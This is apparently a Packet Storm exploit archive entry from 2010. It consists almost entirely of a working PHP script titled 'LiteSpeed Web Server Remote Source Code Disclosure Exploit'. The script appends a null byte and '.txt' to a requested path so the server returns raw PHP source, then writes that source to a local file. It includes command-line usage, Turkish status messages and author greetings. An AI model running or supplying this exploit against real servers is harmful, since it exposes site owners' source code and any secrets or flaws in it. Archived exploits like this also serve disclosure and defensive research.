litespeedsource-disclose.txt

2010-07-03T00:00:00
ID PACKETSTORM:91295
Type packetstorm
Reporter Burtay
Modified 2010-07-03T00:00:00

Description

                                        
                                            ` <?php  
/*  
* LiteSpeed Web Server Remote Source Code Disclosure Exploit  
* Usage : php exploit.php domain.com /path  
* example : php exploit.php burtay.org index.php  
* Coded By Burtay  
* Special Thanks RMx And Megaturks Crews  
*/  
echo "\n ->LiteSpeed Web Server Remote Source Code Disclosure Exploit<-\n\nStarting\n";  
$fp = fsockopen($argv[1], 80, $errno, $errstr, 30);  
if (!$fp)   
{  
echo "$errstr ($errno)<br />\n";  
}   
else {  
$out = "GET /".$argv[2]."\x00.txt HTTP/1.1\r\n";  
$out .= "Host: ".$argv[1]."\r\n";  
$out .= "Connection: Close\r\n\r\n";  
fwrite($fp, $out);  
while (!feof($fp)) {  
$gelen = fgets($fp, 128);  
$dosya = str_replace("/","-",$argv[2]);  
$ac = fopen($argv[1]."-".$dosya,'ab');  
fwrite($ac,$gelen);  
fclose($ac);  
}  
echo "Dosya ".$dosya." adi ile kaydedildi\n";  
echo "Coded By Burtay\n";  
echo "Burtay.Org\n";  
echo "Megaturks.Net\n";  
fclose($fp);  
}  
?> `